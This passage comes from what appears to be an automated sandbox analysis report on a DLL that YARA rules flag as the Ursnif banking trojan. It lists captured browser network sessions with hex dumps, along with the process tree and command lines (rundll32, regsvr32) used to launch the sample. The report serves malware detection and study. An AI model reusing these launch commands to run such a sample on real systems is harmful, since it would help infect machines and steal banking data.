a8 4b 34 f8 4e dd 3e aa f6 8d 8c 88 bd 84 Data Ascii: $6I^kQ9 t{f%"5-VlJCjK%pBH~vUbO?=.tHD5=.&XqTI~N"J'o5nbI!TGhGGoj1TYQ4wmT6 Q\|w$%o7\|rENK4N>
2021-10-07 13:51:55 UTC	147	IN	Data Raw: f9 b0 5e 47 56 e6 aa 92 07 36 25 77 0b 5e 09 97 8b 3c 01 49 3b 21 f2 c3 cb a9 db 7d b5 fc 79 68 1c 56 b7 76 e8 2c 3b 2a bc 48 59 a3 01 5b aa 38 8d 83 7c bf dc 87 b7 0d 6d fa 90 74 26 0e 56 29 0e eb d8 8f b8 bf 16 2e 3e 3e 5b b6 e7 54 12 cb d2 8a 9c 94 e5 b7 10 f6 ed 3d be 8f 50 f1 e6 77 5f b8 71 3b 30 d6 33 25 1e 29 21 46 b9 8c ab 0e f2 cd 77 bc 54 df 80 eb 2c 50 38 24 3f 3f 91 0d 19 3b 80 05 c3 16 0a c2 50 4f 51 b1 19 1b 30 35 59 9d 08 b5 19 7e 4d 1a 3b 07 72 1d 79 b9 d9 41 0a 01 9a 2c 8f b9 9f 2a 97 85 84 26 c4 20 7b 68 b9 1b 45 a5 85 d0 f3 0a 92 04 20 16 df b9 ef fc 6e 3a 27 58 20 87 9f 08 62 00 12 11 21 87 7f c2 13 b6 a6 78 2a 46 36 96 4e 7c 9c 3f cb 9b f1 fd fe 06 9e 3a fc ca 2b 17 60 e7 b1 1f 00 18 11 b8 f0 48 ed e7 41 7d 33 82 62 f6 1a 67 01 2d 4b Data Ascii: ^GV6%w^<I;!}yhVv,;HY[8\|mt&V).>>[T=Pw_q;03%)!FwT,P8$??;POQ05Y~M;ryA,& {hE n:'X b!x*F6N\|?:+`HA}3bg-K
2021-10-07 13:51:55 UTC	148	IN	Data Raw: e4 04 25 b6 5e ed cb b7 7c 0e 12 de 27 0d 6e a7 b7 dd 9e 29 ad 58 0a 72 13 39 8b 92 cd 02 21 52 8a 81 98 92 40 1c 7b 1c 83 57 ab 93 b8 2a bc 05 6c 07 8a 72 d0 a5 98 67 7d e4 31 4a b0 c9 1f 32 be 00 1c f4 aa 91 85 32 71 2c 77 6d bf d5 e0 fe c0 00 68 28 fc 03 f1 1a b5 26 67 2b 2a d6 95 e5 3d 5f f0 e9 f2 76 44 03 fe fb ea 1a ef 42 a7 b3 a7 07 35 92 68 e2 45 06 79 52 11 cc 8d d5 42 f2 d2 a5 54 51 37 a7 b1 6c 79 88 95 d7 e3 6e c6 dd 9a c3 03 f1 1e 23 1a 67 7b 72 28 c7 c5 59 b6 b6 f6 54 72 ea 44 4f d8 23 3d cb 9d 80 1a b3 24 89 54 47 2b 51 44 83 76 2b b1 2d 21 0c cc c3 f6 bc 41 d0 b3 13 c2 eb 8b b9 4a bf 26 95 63 f9 32 c9 02 77 57 03 cb 0e c7 53 50 a0 5a 69 ab 19 9e 32 25 b6 83 e0 24 e0 cc 14 2a 92 50 13 dc e9 6c 2f b6 31 75 23 25 a2 25 1c 92 03 78 27 bf 7d b4 Data Ascii: %^\|'n)Xr9!R@{Wlrg}1J22q,wmh(&g+=_vDB5hEyRBTQ7lyn#g{r(YTrDO#=$TG+QDv+-!AJ&c2wWSPZi2%$*Pl/1u#%%x'}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49804	172.217.168.38	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:51 UTC	12	OUT	GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: ad.doubleclick.net Connection: Keep-Alive Cookie: IDE=AHWqTUmYUECPaufv9uO9HoZuaxRLSg5dGz_-QhiA_NR2P4lElZyv3fzE7AZa07XP
2021-10-07 13:51:51 UTC	12	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: image/x-icon Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="ads-doubleclick-media" Report-To: {"group":"ads-doubleclick-media","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-doubleclick-media"}]} Content-Length: 1078 Date: Thu, 07 Oct 2021 06:41:48 GMT Expires: Fri, 08 Oct 2021 06:41:48 GMT Last-Modified: Tue, 08 May 2012 13:08:06 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Age: 25803 Cache-Control: public, max-age=86400 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-10-07 13:51:51 UTC	13	IN	Data Raw: 00 00 01 00 02 00 10 10 10 00 00 00 00 00 28 01 00 00 26 00 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 4e 01 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 Data Ascii: (& N(
2021-10-07 13:51:51 UTC	13	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49811	142.250.203.98	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:52 UTC	15	OUT	GET /pixel?cs=1&google_nid=media&google_cm=1&google_hm=Mjc2NjE2MzExNjY4NDE2ODAwMFYxMA%3D%3D&google_sc=1 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: cm.g.doubleclick.net Connection: Keep-Alive Cookie: IDE=AHWqTUmYUECPaufv9uO9HoZuaxRLSg5dGz_-QhiA_NR2P4lElZyv3fzE7AZa07XP
2021-10-07 13:51:52 UTC	16	IN	HTTP/1.1 302 Found P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Location: https://cs.media.net/cksync?type=g&cs=1&google_gid=CAESENlypXSQarzyPfZadJregtU&google_cver=1 Date: Thu, 07 Oct 2021 13:51:52 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Cross-Origin-Resource-Policy: cross-origin Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 301 X-XSS-Protection: 0 Set-Cookie: IDE=AHWqTUlHPkNa6plymW9JTgSNVG2qEeIJ_G_IptnSH_2mFtME07xAKM_VEZoF-OQ-Uys; expires=Mon, 25-Oct-2021 07:24:04 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-10-07 13:51:52 UTC	17	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 63 73 2e 6d 65 64 69 61 2e 6e 65 74 2f 63 6b 73 79 6e 63 3f 74 79 70 65 3d 67 26 61 6d 70 3b 63 73 3d 31 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 67 69 64 3d 43 41 45 53 45 4e 6c 79 70 58 53 51 61 72 7a 79 50 66 5a 61 64 4a 72 65 67 74 55 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://cs.media.net/cksync?type=g&cs=1&google_gid=CAESENlypXSQarzyPfZadJregtU&

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49813	18.156.81.187	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:52 UTC	17	OUT	GET /sync?ssp=medianet&gdpr=0&gdpr_consent=&gdpr_pd=1 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: x.bidswitch.net Connection: Keep-Alive
2021-10-07 13:51:52 UTC	18	IN	HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, no-store, must-revalidate Date: Thu, 07 Oct 2021 13:51:52 GMT Location: https://x.bidswitch.net/ul_cb/sync?ssp=medianet&gdpr=0&gdpr_consent=&gdpr_pd=1 Set-Cookie: tuuid=ed0d0c9d-eb5e-460c-94bd-331d1d38e375; path=/; expires=Fri, 07-Oct-2022 13:51:52 GMT; domain=.bidswitch.net; samesite=none; secure Set-Cookie: c=1633614712; path=/; expires=Fri, 07-Oct-2022 13:51:52 GMT; domain=.bidswitch.net; samesite=none; secure Set-Cookie: tuuid_lu=1633614712; path=/; expires=Fri, 07-Oct-2022 13:51:52 GMT; domain=.bidswitch.net; samesite=none; secure Set-Cookie: c=1633614712; path=/; expires=Fri, 07-Oct-2022 13:51:52 GMT; domain=.bidswitch.net; samesite=none; secure Content-Length: 0 Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49812	18.156.81.187	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:52 UTC	19	OUT	GET /ul_cb/sync?ssp=medianet&gdpr=0&gdpr_consent=&gdpr_pd=1 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: x.bidswitch.net Connection: Keep-Alive Cookie: tuuid=ed0d0c9d-eb5e-460c-94bd-331d1d38e375; c=1633614712; tuuid_lu=1633614712
2021-10-07 13:51:52 UTC	19	IN	HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, no-store, must-revalidate Date: Thu, 07 Oct 2021 13:51:52 GMT Location: //rtb.mfadsrvr.com/sync?ssp=bidswitch&bidswitch_ssp_id=medianet&bsw_user_id=ed0d0c9d-eb5e-460c-94bd-331d1d38e375 Set-Cookie: tuuid=ed0d0c9d-eb5e-460c-94bd-331d1d38e375; path=/; expires=Fri, 07-Oct-2022 13:51:52 GMT; domain=.bidswitch.net; samesite=none; secure Set-Cookie: tuuid_lu=1633614712; path=/; expires=Fri, 07-Oct-2022 13:51:52 GMT; domain=.bidswitch.net; samesite=none; secure Content-Length: 0 Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49815	35.244.174.68	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:52 UTC	20	OUT	GET /710489.gif HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: id.rlcdn.com Connection: Keep-Alive
2021-10-07 13:51:52 UTC	20	IN	HTTP/1.1 451 Unavailable For Legal Reasons Date: Thu, 07 Oct 2021 13:51:52 GMT Content-Length: 0 Via: 1.1 google Alt-Svc: clear Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49820	76.223.111.131	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:52 UTC	21	OUT	GET /track/cmf/generic?ttd_pid=8m33zk4&ttd_tpi=1 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: match.adsrvr.org Connection: Keep-Alive
2021-10-07 13:51:53 UTC	21	IN	HTTP/1.1 302 Found Date: Thu, 07 Oct 2021 13:51:52 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: private,no-cache, must-revalidate Pragma: no-cache Location: https://match.adsrvr.org/track/cmb/generic?ttd_pid=8m33zk4&ttd_tpi=1 X-AspNet-Version: 4.0.30319 Set-Cookie: TDID=aa6413c2-4ba3-4951-8cf4-a124e7cfad6b; domain=.adsrvr.org; expires=Fri, 07-Oct-2022 13:51:52 GMT; path=/; secure; SameSite=None Set-Cookie: TDCPM=CAEYBSgCMgsI_s7Dl4vphDoQBTgB; domain=.adsrvr.org; expires=Fri, 07-Oct-2022 13:51:52 GMT; path=/; secure; SameSite=None P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
2021-10-07 13:51:53 UTC	22	IN	Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 74 63 68 2e 61 64 73 72 76 72 2e 6f 72 67 2f 74 72 61 63 6b 2f 63 6d 62 2f 67 65 6e 65 72 69 63 3f 74 74 64 5f 70 69 64 3d 38 6d 33 33 7a 6b 34 26 74 74 64 5f 74 70 69 3d 31 22 3e 68 74 74 70 73 3a 2f 2f 6d 61 74 63 68 2e 61 64 73 72 76 72 2e 6f 72 67 2f 74 72 61 63 6b 2f 63 6d 62 2f 67 65 6e 65 72 69 63 3f 74 74 64 5f 70 69 64 3d 38 6d 33 33 7a 6b 34 26 74 74 64 5f 74 70 69 3d 31 3c 2f 61 3e Data Ascii: Redirecting to: <a href="https://match.adsrvr.org/track/cmb/generic?ttd_pid=8m33zk4&ttd_tpi=1">https://match.adsrvr.org/track/cmb/generic?ttd_pid=8m33zk4&ttd_tpi=1</a>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49819	76.223.111.131	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:53 UTC	22	OUT	GET /track/cmb/generic?ttd_pid=8m33zk4&ttd_tpi=1 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: match.adsrvr.org Connection: Keep-Alive Cookie: TDID=aa6413c2-4ba3-4951-8cf4-a124e7cfad6b; TDCPM=CAEYBSgCMgsI_s7Dl4vphDoQBTgB
2021-10-07 13:51:53 UTC	22	IN	HTTP/1.1 302 Found Date: Thu, 07 Oct 2021 13:51:53 GMT Content-Type: text/html Content-Length: 199 Connection: close Cache-Control: private,no-cache, must-revalidate Pragma: no-cache Location: https://cs.media.net/cksync?cs=1&type=ttd&ovsid=aa6413c2-4ba3-4951-8cf4-a124e7cfad6b X-AspNet-Version: 4.0.30319 Set-Cookie: TDID=aa6413c2-4ba3-4951-8cf4-a124e7cfad6b; domain=.adsrvr.org; expires=Fri, 07-Oct-2022 13:51:53 GMT; path=/; secure; SameSite=None Set-Cookie: TDCPM=CAEYBSABKAIyCwj-zsOXi-mEOhAFOAE.; domain=.adsrvr.org; expires=Fri, 07-Oct-2022 13:51:53 GMT; path=/; secure; SameSite=None P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
2021-10-07 13:51:53 UTC	23	IN	Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 73 2e 6d 65 64 69 61 2e 6e 65 74 2f 63 6b 73 79 6e 63 3f 63 73 3d 31 26 74 79 70 65 3d 74 74 64 26 6f 76 73 69 64 3d 61 61 36 34 31 33 63 32 2d 34 62 61 33 2d 34 39 35 31 2d 38 63 66 34 2d 61 31 32 34 65 37 63 66 61 64 36 62 22 3e 68 74 74 70 73 3a 2f 2f 63 73 2e 6d 65 64 69 61 2e 6e 65 74 2f 63 6b 73 79 6e 63 3f 63 73 3d 31 26 74 79 70 65 3d 74 74 64 26 6f 76 73 69 64 3d 61 61 36 34 31 33 63 32 2d 34 62 61 33 2d 34 39 35 31 2d 38 63 66 34 2d 61 31 32 34 65 37 63 66 61 64 36 62 3c 2f 61 3e Data Ascii: Redirecting to: <a href="https://cs.media.net/cksync?cs=1&type=ttd&ovsid=aa6413c2-4ba3-4951-8cf4-a124e7cfad6b">https://cs.media.net/cksync?cs=1&type=ttd&ovsid=aa6413c2-4ba3-4951-8cf4-a124e7cfad6b</a>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5692 Parent PID: 5384

General

Start time:	15:51:31
Start date:	07/10/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\a04.dll'
Imagebase:	0x10000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.862882724.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1182185098.00000000030A9000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.862687156.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.863055809.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.862929900.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.862999025.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.810323284.0000000000FF0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.862717977.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.863040607.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.1182360393.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.862644494.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5052 Parent PID: 5692

General

Start time:	15:51:32
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\a04.dll',#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 1576 Parent PID: 5692

General

Start time:	15:51:32
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\a04.dll
Imagebase:	0xc00000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.986796014.0000000005568000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.986936455.0000000005568000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.986844701.0000000005568000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.986951614.0000000005568000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.800171088.0000000000BB0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.986702942.0000000005568000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.986736746.0000000005568000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.986915722.0000000005568000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.986870790.0000000005568000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.1182699282.0000000004CB9000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.1182795536.0000000005568000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3436 Parent PID: 5052

General

Start time:	15:51:32
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\a04.dll',#1
Imagebase:	0x11d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.908592285.0000000005AF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.908402373.0000000005AF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.908284836.0000000005AF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.1183574804.0000000005AF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.1183218956.00000000050D9000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.908521770.0000000005AF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.908362779.0000000005AF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.804569099.00000000032C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.908553310.0000000005AF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.908608901.0000000005AF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.908487582.0000000005AF8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 2792 Parent PID: 5692

General

Start time:	15:51:32
Start date:	07/10/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff731bb0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3160 Parent PID: 5692

General

Start time:	15:51:34
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
